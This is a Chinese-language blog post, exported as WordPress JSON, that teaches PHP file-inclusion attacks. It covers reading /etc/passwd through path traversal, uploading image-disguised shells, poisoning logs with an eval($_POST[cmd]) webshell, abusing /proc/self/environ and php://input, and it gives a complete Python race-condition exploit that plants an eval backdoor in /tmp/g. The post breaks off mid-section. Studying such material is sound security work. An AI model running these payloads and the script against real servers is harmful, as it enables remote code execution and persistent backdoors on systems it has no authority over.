{"id":787,"date":"2025-10-24T14:57:53","date_gmt":"2025-10-24T06:57:53","guid":{"rendered":"https:\/\/www.youvii.site\/?p=787"},"modified":"2025-10-24T15:00:40","modified_gmt":"2025-10-24T07:00:40","slug":"wenjianbaohan","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/wenjianbaohan","title":{"rendered":"\u6587\u4ef6\u5305\u542b"},"content":{"rendered":"

\u6587\u4ef6\u5305\u542b<\/h1>\n

\u6982\u8ff0<\/h1>\n

\u7a0b\u5e8f\u5728\u5f15\u7528\u6587\u4ef6\u7684\u65f6\uff0c\u5f15\u7528\u7684\u6587\u4ef6\u540d\uff0c\u7528\u6237\u53ef\u63a7\u7684\u60c5\u51b5\uff0c\u4f20\u5165\u7684\u6587\u4ef6\u540d\u6ca1\u6709\u7ecf\u8fc7\u5408\u7406\u7684\u6821\u9a8c\u6216\u6821\u9a8c\u4e0d\u4e25\uff0c\u4ece\u800c\u64cd\u4f5c\u4e86\u9884\u60f3\u4e4b\u5916\u7684\u6587\u4ef6\uff0c\u5c31\u6709\u53ef\u80fd\u5bfc\u81f4\u6587\u4ef6\u6cc4\u6f0f\u548c\u6076\u610f\u7684\u4ee3\u7801\u6ce8\u5165\u3002 <\/p>\n

\u7a0b\u5e8f\u5f00\u53d1\u4eba\u5458\u4e00\u822c\u4f1a\u628a\u91cd\u590d\u4f7f\u7528\u7684\u51fd\u6570\u5199\u5230\u5355\u4e2a\u6587\u4ef6\u4e2d\uff0c\u9700\u8981\u4f7f\u7528\u67d0\u4e2a\u51fd\u6570\u65f6\u76f4\u63a5\u8c03\u7528\u6b64\u6587\u4ef6\uff0c\u800c\u65e0\u9700\u518d\u6b21\u7f16\u5199<\/p>\n

\u91cd\u6587\u4ef6\u8c03\u7528\u7684\u8fc7\u7a0b\u4e00\u822c\u88ab\u79f0\u4e3a\u6587\u4ef6\u5305\u542b\u3002 <\/p>\n

\u7a0b\u5e8f\u5f00\u53d1\u4eba\u5458\u4e00\u822c\u5e0c\u671b\u4ee3\u7801\u66f4\u7075\u6d3b\uff0c\u6240\u4ee5\u5c06\u88ab\u5305\u542b\u7684\u6587\u4ef6\u8bbe\u7f6e\u4e3a\u53d8\u91cf\uff0c\u7528\u6765\u8fdb\u884c\u52a8\u6001\u8c03\u7528\uff0c\u4f46\u6b63\u662f\u7531\u4e8e\u8fd9\u79cd\u7075\u6d3b\u6027\uff0c\u4ece\u800c\u5bfc\u81f4\u5ba2\u6237\u7aef\u53ef\u4ee5\u8c03\u7528\u4e00\u4e2a\u6076\u610f\u6587\u4ef6\uff0c\u9020\u6210\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u3002 \u51e0\u4e4e\u6240\u6709\u811a\u672c\u8bed\u8a00\u90fd\u4f1a\u63d0\u4f9b\u6587\u4ef6\u5305\u542b\u7684\u529f\u80fd\uff0c\u4f46\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5728 PHP Web Application \u4e2d\u5c45\u591a, \u800c\u5728 JSP\u3001ASP\u3001ASP.NET \u7a0b\u5e8f\u4e2d\u5374\u975e\u5e38\u5c11\uff0c\u751a\u81f3\u6ca1\u6709\uff0c\u8fd9\u662f\u6709\u4e9b\u8bed\u8a00\u8bbe\u8ba1\u7684\u5f0a\u7aef\u3002\u5728PHP \u4e2d\u7ecf\u5e38\u51fa\u73b0\u5305\u542b\u6f0f\u6d1e\uff0c\u4f46\u8fd9\u5e76\u4e0d\u610f\u5473\u8fd9\u5176\u4ed6\u8bed\u8a00\u4e0d\u5b58\u5728<\/p>\n

\u5e38\u89c1\u6587\u4ef6\u5305\u542b\u51fd\u6570<\/h1>\n

include()\uff1a\u6267\u884c\u5230 include \u65f6\u624d\u5305\u542b\u6587\u4ef6\uff0c\u627e\u4e0d\u5230\u88ab\u5305\u542b\u6587\u4ef6\u65f6\u53ea\u4f1a\u4ea7\u751f\u8b66\u544a\uff0c\u811a\u672c\u5c06\u7ee7\u7eed\u6267\u884c<\/p>\n

require()\uff1a\u53ea\u8981\u7a0b\u5e8f\u4e00\u8fd0\u884c\u5c31\u5305\u542b\u6587\u4ef6\uff0c\u627e\u4e0d\u5230\u88ab\u5305\u542b\u7684\u6587\u4ef6\u65f6\u4f1a\u4ea7\u751f\u81f4\u547d\u9519\u8bef\uff0c\u5e76\u505c\u6b62\u811a\u672c<\/p>\n

include_once()\u548c require_once()\uff1a\u82e5\u6587\u4ef6\u4e2d\u4ee3\u7801\u5df2\u88ab\u5305\u542b\u5219\u4e0d\u4f1a\u518d\u6b21\u5305\u542b<\/p>\n

\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4ee3\u7801\u5206\u6790<\/h1>\n

\"1746362356344-a0c26ab2-2d01-4ce4-b2bb-13be38cd928f.png\"<\/p>\n

$_GET[‘filename’] \u63a5\u6536\u5ba2\u6237\u7aef\u4f20\u7684\u53c2\u6570\uff0c\u5176\u4e2d\u6ca1\u6709\u4efb\u4f55\u8fc7\u6ee4 \u5e26\u5165\u5230 include \u51fd\u6570\u4e2d\uff0cinclude \u5305\u542b\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5f15\u5165\u5230\u5f53\u524d\u6587\u4ef6\u4e2d\uff0c\u56e0\u6b64\u4f1a\u9020\u6210\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/p>\n

\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5229\u7528\u65b9\u6cd5<\/h1>\n

\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u9700\u8981\u5f15\u5165\u4e0a\u4f20\u7684\u6587\u4ef6\u5230\u7f51\u7ad9\u76ee\u5f55\uff0c\u6216\u662f\u670d\u52a1\u5668\u5185\u90e8\u7684\u6587\u4ef6\uff0c\u800c\u4e14\u662f\u6743\u9650\u662f\u53ef\u8bfb\uff0c\u624d\u80fd\u5f15\u5165\u8fdb\u6765\uff0c\u6216\u8fdc\u7a0b\u5305\u542b\u8fdb\u6765\uff0c\u4f46\u662f\u9700\u8981\u6761\u4ef6<\/p>\n

\u672c\u5730\u5305\u542b\u6587\u4ef6<\/h1>\n

\u672c\u5730\u5305\u542b\u6587\u4ef6\uff0c\u88ab\u5305\u542b\u7684\u6587\u4ef6\u5728\u672c\u5730<\/p>\n

\u6587\u4ef6\u5305\u542b\/etc\/passwd<\/h2>\n

\"1746362415783-03af9aff-4fad-44c3-a943-76d5ae963192.png\"<\/p>\n

..\/\u662f\u4e0a\u4e00\u7ea7\u8def\u5f84\u3002\u5982\u679c\u5b58\u5728\u6f0f\u6d1e\uff0c\u6587\u4ef6\u53c8\u5b58\u5728\u7684\u65f6\u5019\uff0c\u4e0d\u662f php \u6587\u4ef6\u4f1a\u88ab\u8bfb\u53d6\u663e\u793a\u5728\u9875\u9762\u4e2d\u3002\/etc\/passwd \u6587\u4ef6\u662f linux \u91cc\u7684\u654f\u611f\u4fe1\u606f\uff0c\u6587\u4ef6\u91cc\u5b58\u6709 linux \u7528\u6237\u7684\u914d\u7f6e\u4fe1\u606f <\/p>\n

\u6587\u4ef6\u5305\u542b\u56fe\u7247<\/h2>\n

\u5bfb\u627e\u7f51\u7ad9\u4e0a\u4f20\u70b9\uff0c\u628a php \u6076\u610f\u4ee3\u7801\u6587\u4ef6\u6539\u6210 jpg \u4e0a\u4f20\u5230\u7f51\u7ad9\u4e0a\uff0c\u672c\u5730\u5305\u542b\u5f15\u5165\u6076\u610f\u4ee3\u7801\uff0c\u5f53\u6587\u4ef6\u88ab\u5f15\u5165\u540e\u4ee3\u7801\u5c31\u88ab\u6267\u884c\u3002 <\/p>\n

\"1746362490181-9d71a011-7da4-47c7-a64a-9197c5942e82.png\"\u4fdd\u5b58\u4e3a shell.jpg <\/p>\n

\u4e0a\u4f20\u56fe\u7247\u683c\u5f0f\u5230\u7f51\u7ad9 \u518d\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5f15\u5165\u56fe\u7247 \u6210\u529f\u6267\u884c\u4ee3\u7801 <\/p>\n

\"1746362515525-ecc2f5c0-6f5f-46bb-a341-676eb7ada7ca.png\"<\/p>\n

\u5305\u542b\u65e5\u5fd7\u6587\u4ef6getshell<\/h2>\n

\u4e2d\u95f4\u4ef6\u4f8b\u5982 iis \u3001apache\u3001nginx \u8fd9\u4e9b web \u4e2d\u95f4\u4ef6\uff0c\u90fd\u4f1a\u8bb0\u5f55\u8bbf\u95ee\u65e5\u5fd7\uff0c\u5982\u679c\u8bbf\u95ee\u65e5\u5fd7\u4e2d\u6216\u9519\u8bef\u65e5\u5fd7\u4e2d\uff0c\u5b58\u5728\u6709 php \u4ee3\u7801\uff0c\u4e5f\u53ef\u4ee5\u5f15\u5165\u5230\u6587\u4ef6\u5305\u542b\u4e2d\u3002\u5982\u679c\u65e5\u5fd7\u6709 php \u6076\u610f\u4ee3\u7801\uff0c\u4e5f\u53ef\u5bfc\u81f4 getshell\u3002\u4f7f\u7528 burpsuite \u8bbf\u95ee GET \u586b\u5199 <? php phpinfo();eval($_POST[cmd]);?><\/p>\n

\"1746362589312-14586a4b-8c2f-42ff-82d4-aa3ec57cc1ee.png\"<\/p>\n

\u5728linux\u4e0b\u65e5\u5fd7\u6587\u4ef6\u6743\u9650\u9ed8\u8ba4\u662f root \u800cphp\u7684\u6743\u9650\u662f www-data \u4e00\u822c\u60c5\u51b5\u4e0b\u90fd\u662f\u8bfb\u53d6\u4e0d\u4e86\uff0c\u5982\u679c\u662fwindows \u73af\u5883\u4e0b\u662f\u53ef\u4ee5\u6743\u9650\u662f\u5141\u8bb8\u7684<\/p>\n

linux \u9ed8\u8ba4\u7684 apache \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\u662f <\/p>\n

\u8bbf\u95ee\u65e5\u5fd7 \/var\/log\/apache2\/access.log <\/p>\n

\u9519\u8bef\u65e5\u5fd7 \/var\/log\/apache2\/error.log \u628a\u6587\u4ef6\u65e5\u5fd7\u5305\u542b\u8fdb\u6765\u5373\u53ef <\/p>\n

\u5305\u542b\u73af\u5883\u53d8\u91cfgetshell<\/h2>\n

\u4fee\u6539User-Agen\u586b\u5199php\u4ee3\u7801<\/p>\n

\"1746362663903-372408f1-8cec-42c0-8a5f-91b6d9fb5b47.png\"<\/p>\n

\/proc\/self\/environ\u8fd9\u4e2a\u6587\u4ef6\u91cc\u4fdd\u5b58\u4e86\u7cfb\u7edf\u4e00\u4e9b\u53d8\u91cf<\/p>\n

\u5982\u679c\u6743\u9650\u8db3\u591f\uff0c\u5305\u542b\u8fd9\u4e2a\u6587\u4ef6\u5c31\u80fdgetshell<\/p>\n

phpinfo\u6587\u4ef6\u5305\u542b\u4e34\u65f6\u6587\u4ef6<\/h2>\n

\u5229\u7528php post\u4e0a\u4f20\u6587\u4ef6\u4ea7\u751f\u4e34\u65f6\u6587\u4ef6\uff0cphpinfo()\u8bfb\u4e34\u65f6\u6587\u4ef6\u7684\u8def\u5f84\u548c\u540d\u5b57\uff0c\u672c\u5730\u5305\u542b\u6f0f\u6d1e\u751f\u6210\u4e00\u53e5\u8bdd\u540e\u95e8<\/p>\n

1.php \u5728\u89e3\u6790 multipart\/form-data \u8bf7\u6c42\u65f6\uff0c\u4f1a\u521b\u5efa\u4e34\u65f6\u6587\u4ef6\uff0c\u5e76\u5199\u5165\u4e0a\u4f20\u5185\u5bb9\uff0c\u811a\u672c\u6267\u884c\u540e\u5373\u5220\u9664<\/p>\n

2.phpinfo \u53ef\u4ee5\u8f93\u51fa$_FILE \u4fe1\u606f<\/p>\n

3.\u901a\u8fc7\u591a\u79cd\u65b9\u5f0f\u4e89\u53d6\u65f6\u95f4\uff0c\u5728\u4e34\u65f6\u6587\u4ef6\u5220\u9664\u524d\u8fdb\u884c\u6267\u884c\u5305\u542b<\/p>\n

1\uff09\u901a\u8fc7\u5728\u6570\u636e\u62a5\u6587\u4e2d\u52a0\u5165\u5927\u91cf\u7684\u5783\u573e\u6570\u636e\uff0c\u4f3c phpinfo \u9875\u9762\u8fc7\u5927\uff0c\u5bfc\u81f4 phpinfo \u9875\u9762\u8fc7\u5927\uff0c\u5bfc\u81f4php \u8f93\u51fa\u8fdb\u5165\u6d41\u5f0f\u8f93\u51fa\uff0c\u5e76\u4e0d\u4e00\u6b21\u8f93\u51fa\u5b8c\u6bd5 <\/p>\n

2\uff09\u901a\u8fc7\u5927\u91cf\u8bf7\u6c42\u6765\u5ef6\u8fdf php \u811a\u672c\u7684\u6267\u884c\u901f\u5ea6 php post \u65b9\u5f0f\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\uff0c\u670d\u52a1\u5668\u90fd\u4f1a\u521b\u5efa\u4e34\u65f6\u6587\u4ef6\u6765\u4fdd\u5b58\u6587\u4ef6\u5185\u5bb9\u3002 \u5728 HTTP \u534f\u8bae\u4e2d\u4e3a\u4e86\u65b9\u4fbf\u8fdb\u884c\u6587\u4ef6\u4f20\u8f93\uff0c\u89c4\u5b9a\u4e86\u4e00\u79cd\u57fa\u4e8e\u8868\u5355\u7684 HTML \u6587\u4ef6\u4f20\u8f93\u65b9\u6cd5 \u5176\u4e2d\u8981\u786e\u4fdd\u4e0a\u4f20\u8868\u5355\u7684\u5c5e\u6027\u662f enctype="multipart\/form-data" \u5176\u4e2d PHP \u5f15\u64ce\u5bf9 enctype="multipart\/form-data"\u8fd9\u79cd\u8bf7\u6c42\u7684\u5904\u7406\u8fc7\u7a0b\u5982\u4e0b\uff1a<\/p>\n

1\u3001\u8bf7\u6c42\u5230\u8fbe\uff1b <\/p>\n

2\u3001\u521b\u5efa\u4e34\u65f6\u6587\u4ef6\uff0c\u5e76\u5199\u5165\u4e0a\u4f20\u6587\u4ef6\u7684\u5185\u5bb9\uff1b <\/p>\n

3\u3001\u8c03\u7528\u76f8\u5e94 PHP \u811a\u672c\u8fdb\u884c\u5904\u7406\uff0c\u5982\u6821\u9a8c\u540d\u79f0\u3001\u5927\u5c0f\u7b49\uff1b<\/p>\n

4\u3001\u5220\u9664\u4e34\u65f6\u6587\u4ef6\u3002 PHP \u5f15\u64ce\u4f1a\u9996\u5148\u5c06\u6587\u4ef6\u5185\u5bb9\u4fdd\u5b58\u5230\u4e34\u65f6\u6587\u4ef6\uff0c\u7136\u540e\u8fdb\u884c\u76f8\u5e94\u7684\u64cd\u4f5c\u3002\u4e34\u65f6\u6587\u4ef6\u7684\u540d\u79f0\u662fphp+\u968f\u673a\u5b57\u7b26 <\/p>\n

$_FILES \u4fe1\u606f\uff0c\u5305\u62ec\u4e34\u65f6\u6587\u4ef6\u8def\u5f84\u3001\u540d\u79f0 <\/p>\n

\u5728 PHP \u4e2d\uff0c\u6709\u8d85\u5168\u5c40\u53d8\u91cf$_FILES,\u4fdd\u5b58\u4e0a\u4f20\u6587\u4ef6\u7684\u4fe1\u606f\uff0c\u5305\u62ec\u6587\u4ef6\u540d\u3001\u7c7b\u578b\u3001\u4e34\u65f6\u6587\u4ef6\u540d\u3001\u9519\u8bef\u4ee3\u53f7\u3001\u5927\u5c0f <\/p>\n

\u628a\u6587\u4ef6\u4e0a\u4f20\u5230 phpinfo \u83b7\u53d6\u4e34\u65f6\u6587\u4ef6\u8def\u5f84 <\/p>\n

<!doctype html>\n<html>\n<body>\n<form action=\"http:\/\/192.168.0.103\/06\/phpinfo.php\" method=\"POST\"\nenctype=\"multipart\/form-data\">\n<h3> Test upload tmp file<\/h3>\n<label for=\"file\">Filename:<\/label>\n<input type=\"file\" name=\"file\"\/><br\/>\n<input type=\"submit\" name=\"submit\" value=\"Submit\" \/>\n<\/form>\n<\/body>\n<\/html><\/code><\/pre>\n
\"1746362856150-cfcb727f-f94f-4f2a-94f1-eaeb178d0484.png\"<\/p>\n
\u901a\u8fc7 phpinfo \u4e34\u65f6\u6587\u4ef6 getshell<\/p>\n
php \u672c\u5730\u5305\u542b\u6587\u4ef6\u5229\u7528\u811a\u672c \u4fee\u6539\u5229\u7528\u7684\u8def\u5f84\u548c\u6587\u4ef6\u5373\u53ef\u3002<\/p>\n
#!\/usr\/bin\/python\nimport sys\nimport threading\nimport socket\ndef setup(host, port):\nTAG=\"Security Test\"\nPAYLOAD=\"\"\"%sr\n<?php file_put_contents('\/tmp\/g', '<?=eval($_REQUEST[1])?>')?>r\"\"\" % TAG\nREQ1_DATA=\"\"\"-----------------------------7dbff1ded0714r\nContent-Disposition: form-data; name=\"dummyname\"; filename=\"test.txt\"r\nContent-Type: text\/plainr\nr\n%s\n-----------------------------7dbff1ded0714--r\"\"\" % PAYLOAD\npadding=\"A\" * 5000\nREQ1=\"\"\"POST \/phpinfo.php?a=\"\"\"+padding+\"\"\" HTTP\/1.1r\nCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=\"\"\"+padding+\"\"\"r\nHTTP_ACCEPT: \"\"\" + padding + \"\"\"r\nHTTP_USER_AGENT: \"\"\"+padding+\"\"\"r\nHTTP_ACCEPT_LANGUAGE: \"\"\"+padding+\"\"\"r\nHTTP_PRAGMA: \"\"\"+padding+\"\"\"r\nContent-Type: multipart\/form-data; boundary=---------------------------7dbff1ded0714r\nContent-Length: %sr\nHost: %sr\nr\n%s\"\"\" %(len(REQ1_DATA),host,REQ1_DATA)\n#modify this to suit the LFI script\nLFIREQ=\"\"\"GET \/lfi.php?file=%s HTTP\/1.1r\nUser-Agent: Mozilla\/4.0r\nProxy-Connection: Keep-Aliver\nHost: %sr\nr\nr\n\"\"\"\nreturn (REQ1, TAG, LFIREQ)\ndef phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\ns2.connect((host, port))\ns.send(phpinforeq)\nd = \"\"\nwhile len(d) < offset:\nd += s.recv(offset)\ntry:\ni = d.index(\"[tmp_name] =&gt; \")\nfn = d[i+17:i+31]\nexcept ValueError:\nreturn None\ns2.send(lfireq % (fn, host))\nd = s2.recv(4096)\ns.close()\ns2.close()\nif d.find(tag) != -1:\nreturn fn\ncounter=0\nclass ThreadWorker(threading.Thread):\ndef __init__(self, e, l, m, *args):\nthreading.Thread.__init__(self)\nself.event = e\nself.lock = l\nself.maxattempts = m\nself.args = args\ndef run(self):\nglobal counter\nwhile not self.event.is_set():\nwith self.lock:\nif counter >= self.maxattempts:\nreturn\ncounter+=1\ntry:\nx = phpInfoLFI(*self.args)\nif self.event.is_set():\nbreak\nif x:\nprint \"nGot it! Shell created in \/tmp\/g\"\nself.event.set()\nexcept socket.error:\nreturn\ndef getOffset(host, port, phpinforeq):\n\"\"\"Gets offset of tmp_name in the php output\"\"\"\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host,port))\ns.send(phpinforeq)\nd = \"\"\nwhile True:\ni = s.recv(4096)\nd+=i\nif i == \"\":\nbreak\n# detect the final chunk\nif i.endswith(\"0rnrn\"):\nbreak\ns.close()\ni = d.find(\"[tmp_name] =&gt; \")\nif i == -1:\nraise ValueError(\"No php tmp_name in phpinfo output\")\nprint \"found %s at %i\" % (d[i:i+10],i)\n# padded up a bit\nreturn i+256\ndef main():\nprint \"LFI With PHPInfo()\"\nprint \"-=\" * 30\nif len(sys.argv) < 2:\nprint \"Usage: %s host [port] [threads]\" % sys.argv[0]\nsys.exit(1)\ntry:\nhost = socket.gethostbyname(sys.argv[1])\nexcept socket.error, e:\nprint \"Error with hostname %s: %s\" % (sys.argv[1], e)\nsys.exit(1)\nport=80\ntry:\nport = int(sys.argv[2])\nexcept IndexError:\npass\nexcept ValueError, e:\nprint \"Error with port %d: %s\" % (sys.argv[2], e)\nsys.exit(1)\npoolsz=10\ntry:\npoolsz = int(sys.argv[3])\nexcept IndexError:\npass\nexcept ValueError, e:\nprint \"Error with poolsz %d: %s\" % (sys.argv[3], e)\nsys.exit(1)\nprint \"Getting initial offset...\",\nreqphp, tag, reqlfi = setup(host, port)\noffset = getOffset(host, port, reqphp)\nsys.stdout.flush()\nmaxattempts = 1000\ne = threading.Event()\nl = threading.Lock()\nprint \"Spawning worker pool (%d)...\" % poolsz\nsys.stdout.flush()\ntp = []\nfor i in range(0,poolsz):\ntp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))\nfor t in tp:\nt.start()\ntry:\nwhile not e.wait(1):\nif e.is_set():\nbreak\nwith l:\nsys.stdout.write( \"r% 4d \/ % 4d\" % (counter, maxattempts))\nsys.stdout.flush()\nif counter >= maxattempts:\nbreak\nprint\nif e.is_set():\nprint \"Woot! m\/\"\nelse:\nprint \":(\"\nexcept KeyboardInterrupt:\nprint \"nTelling threads to shutdown...\"\ne.set()\nprint \"Shuttin' down...\"\nfor t in tp:\nt.join()\nif __name__==\"__main__\":\nmain()<\/code><\/pre>\n
\u5177\u4f53\u539f\u7406<\/p>\n
\u5728\u7ed9 PHP \u53d1\u9001 POST \u6570\u636e\u5305\u65f6\uff0c\u5982\u679c\u6570\u636e\u5305\u91cc\u5305\u542b\u6587\u4ef6\u533a\u5757\uff0c\u65e0\u8bba\u8bbf\u95ee\u7684\u4ee3\u7801\u4e2d\u662f\u5426\u6709\u5904\u7406\u6587\u4ef6\u4e0a\u4f20\u7684\u903b\u8f91\uff0cphp \u90fd\u4f1a\u5c06\u8fd9\u4e2a\u6587\u4ef6\u4fdd\u5b58\u6210\u4e00\u4e2a\u4e34\u65f6\u6587\u4ef6\uff08\u901a\u5e38\u662f\/tmp\/php[6 \u4e2a\u968f\u673a\u5b57\u7b26]\uff09\uff0c\u8fd9\u4e2a\u4e34\u65f6\u6587\u4ef6\u5728\u8bf7\u6c42\u7ed3\u675f\u540e\u5c31\u4f1a\u88ab\u5220\u9664\uff0c\u540c\u65f6\uff0cphpinfo \u9875\u9762\u4f1a\u5c06\u5f53\u524d\u8bf7\u6c42\u4e0a\u4e0b\u6587\u4e2d\u6240\u6709\u53d8\u91cf\u90fd\u6253\u5370\u51fa\u6765\u3002\u4f46\u662f\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u548c phpinfo\u9875\u9762\u901a\u5e38\u662f\u4e24\u4e2a\u9875\u9762\uff0c\u7406\u8bba\u4e0a\u6211\u4eec\u9700\u8981\u5148\u53d1\u9001\u6570\u636e\u5305\u7ed9 phpinfo \u9875\u9762\uff0c\u7136\u540e\u4ece\u8fd4\u56de\u9875\u9762\u4e2d\u5339\u914d\u51fa\u4e34\u65f6\u6587\u4ef6\u540d\uff0c\u5c06\u8fd9\u4e2a\u6587\u4ef6\u540d\u53d1\u9001\u7ed9\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u9875\u9762\u3002<\/p>\n
\u56e0\u4e3a\u5728\u7b2c\u4e00\u4e2a\u8bf7\u6c42\u7ed3\u675f\u65f6\uff0c\u4e34\u65f6\u6587\u4ef6\u5c31\u4f1a\u88ab\u5220\u9664\uff0c\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u5c31\u65e0\u6cd5\u8fdb\u884c\u5305\u542b<\/p>\n
\u4f46\u662f\u8fd9\u5e76\u4e0d\u4ee3\u8868\u6211\u4eec\u6ca1\u6709\u529e\u6cd5\u53bb\u5229\u7528\u8fd9\u70b9\u4e0a\u4f20\u6076\u610f\u6587\u4ef6\uff0c\u53ea\u8981\u53d1\u9001\u8db3\u591f\u591a\u7684\u6570\u636e\uff0c\u8ba9\u9875\u9762\u8fd8\u672a\u53cd\u5e94\u8fc7\u6765\uff0c<\/p>\n
\u5c31\u4e0a\u4f20\u6211\u4eec\u7684\u6076\u610f\u6587\u4ef6\uff0c\u7136\u540e\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
1\uff09\u53d1\u9001\u5305\u542b\u4e86 webshell \u7684\u4e0a\u4f20\u6570\u636e\u5305\u7ed9 phpinfo\uff0c\u8fd9\u4e2a\u6570\u636e\u5305\u7684 header\uff0cget \u7b49\u4f4d\u7f6e\u4e00\u5b9a\u8981\u585e\u6ee1\u5783\u573e\u6570\u636e\uff1b<\/p>\n
2\uff09phpinfo \u8fd9\u65f6\u4f1a\u5c06\u6240\u6709\u6570\u636e\u90fd\u6253\u5370\u51fa\u6765\uff0c\u5176\u4e2d\u7684\u5783\u573e\u6570\u636e\u4f1a\u5c06 phpinfo \u6491\u5f97\u975e\u5927<\/p>\n
3\uff09PHP \u9ed8\u8ba4\u7f13\u51b2\u533a\u5927\u5c0f\u662f 4096\uff0c\u5373 PHP \u6bcf\u6b21\u8fd4\u56de 4096 \u4e2a\u5b57\u8282\u7ed9 socket \u8fde\u63a5<\/p>\n
4\uff09\u6240\u4ee5\uff0c\u6211\u4eec\u76f4\u63a5\u64cd\u4f5c\u539f\u751f socket\uff0c\u6bcf\u6b21\u8bfb\u53d6 4096 \u4e2a\u5b57\u8282\uff0c\u53ea\u8981\u8bfb\u53d6\u5230\u7684\u5b57\u7b26\u91cc\u5305\u542b\u4e34\u65f6\u6587\u4ef6\u540d\uff0c\u5c31\u7acb\u5373\u53d1\u9001\u7b2c\u4e8c\u4e2a\u6570\u636e\u5305<\/p>\n
5\uff09\u6b64\u65f6\uff0c\u7b2c\u4e00\u4e2a\u6570\u636e\u5305\u7684 socket \u8fde\u63a5\u5176\u5b9e\u8fd8\u6ca1\u6709\u7ed3\u675f\uff0c\u4f46\u662f PHP \u8fd8\u5728\u7ee7\u7eed\u6bcf\u6b21\u8f93\u51fa 4096 \u4e2a\u5b57\u8282\uff0c\u6240\u4ee5\u4e34\u65f6\u6587\u4ef6\u8fd8\u672a\u88ab\u5220\u9664<\/p>\n
6\uff09\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u65f6\u95f4\u5dee\uff0c\u6210\u529f\u5305\u542b\u4e34\u65f6\u6587\u4ef6\uff0c\u6700\u540e getshell<\/p>\n
\"1746362990939-454651fd-d3f6-47e8-8c95-bc8479b3c566.png\"<\/p>\n
\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7\u7f51\u7ad9\u7684\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u53bb\u5305\u542b\u6267\u884c\u6076\u610f\u4ee3\u7801<\/p>\n
\u4f2a\u534f\u8bae<\/h2>\n
file:\/\/ \u2014 \u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7cfb\u7edf<\/p>\n
http:\/\/ \u2014 \u8bbf\u95ee HTTP(s) \u7f51\u5740<\/p>\n
ftp:\/\/ \u2014 \u8bbf\u95ee FTP(s) URLs<\/p>\n
php:\/\/ \u2014 \u8bbf\u95ee\u5404\u4e2a\u8f93\u5165\/\u8f93\u51fa\u6d41\uff08I\/O streams\uff09<\/p>\n
zlib:\/\/ \u2014 \u538b\u7f29\u6d41<\/p>\n
data:\/\/ \u2014 \u6570\u636e\uff08RFC 2397\uff09<\/p>\n
glob:\/\/ \u2014 \u67e5\u627e\u5339\u914d\u7684\u6587\u4ef6\u8def\u5f84\u6a21\u5f0f<\/p>\n
phar:\/\/ \u2014 PHP \u5f52\u6863<\/p>\n
ssh2:\/\/ \u2014 Secure Shell 2<\/p>\n
rar:\/\/ \u2014 RAR<\/p>\n
ogg:\/\/ \u2014 \u97f3\u9891\u6d41<\/p>\n
expect:\/\/ \u2014 \u5904\u7406\u4ea4\u4e92\u5f0f\u7684\u6d41<\/p>\n
php.ini\u53c2\u6570\u8bbe\u7f6e<\/h3>\n
\u5728 php.ini \u91cc\u6709\u4e24\u4e2a\u91cd\u8981\u7684\u53c2\u6570 allow_url_fopen\u3001allow_url_include\u3002<\/p>\n
allow_url_fopen:\u9ed8\u8ba4\u503c\u662f ON\u3002\u5141\u8bb8 url \u91cc\u7684\u5c01\u88c5\u534f\u8bae\u8bbf\u95ee\u6587\u4ef6\uff1b<\/p>\n
allow_url_include:\u9ed8\u8ba4\u503c\u662f OFF\u3002\u4e0d\u5141\u8bb8\u5305\u542b url \u91cc\u7684\u5c01\u88c5\u534f\u8bae\u5305\u542b\u6587\u4ef6\uff1b<\/p>\n
\u5404\u534f\u8bae\u7684\u5229\u7528\u6761\u4ef6\u548c\u65b9\u6cd5<\/p>\n
\"1746407609234-2e940217-8b58-45ea-8357-78de6b0f442e.png\"<\/p>\n
php:\/\/input<\/h3>\n
php:\/\/input \u53ef\u4ee5\u8bbf\u95ee\u8bf7\u6c42\u7684\u539f\u59cb\u6570\u636e\u7684\u53ea\u8bfb\u6d41\uff0c\u5c06 post \u8bf7\u6c42\u7684\u6570\u636e\u5f53\u4f5c php \u4ee3\u7801\u6267\u884c\u3002\u5f53\u4f20\u5165\u7684\u53c2\u6570\u4f5c\u4e3a\u6587\u4ef6\u540d\u6253\u5f00\u65f6\uff0c\u53ef\u4ee5\u5c06\u53c2\u6570\u8bbe\u4e3a php:\/\/input,\u540c\u65f6 post \u60f3\u8bbe\u7f6e\u7684\u6587\u4ef6\u5185\u5bb9\uff0cphp \u6267\u884c\u65f6\u4f1a\u5c06 post \u5185\u5bb9<\/p>\n
\u5f53\u4f5c\u6587\u4ef6\u5185\u5bb9\u3002<\/p>\n
\u6ce8\uff1a\u5f53 enctype="multipart\/form-data"\uff0cphp:\/\/input \u662f\u65e0\u6548\u7684\u3002<\/p>\n
php.ini \u6761\u4ef6\u662f allow_url_fopen =ON allow_url_include=ON<\/p>\n
\"1746407659860-85125333-7ff8-48cb-9e42-b16b5ee7d5fe.png\"<\/p>\n
\u8bbe\u7f6e\u8bf7\u6c42\u4e3a post \u8bf7\u6c42 \u5728\u6b63\u6587\u8f93\u5165 php \u4ee3\u7801<?php phpinfo();?>\u63d0\u4ea4\u5373\u53ef\u5141\u8bb8<\/p>\n
file:\/\/\u8bbf\u95ee\u672c\u5730\u6587\u4ef6<\/h3>\n
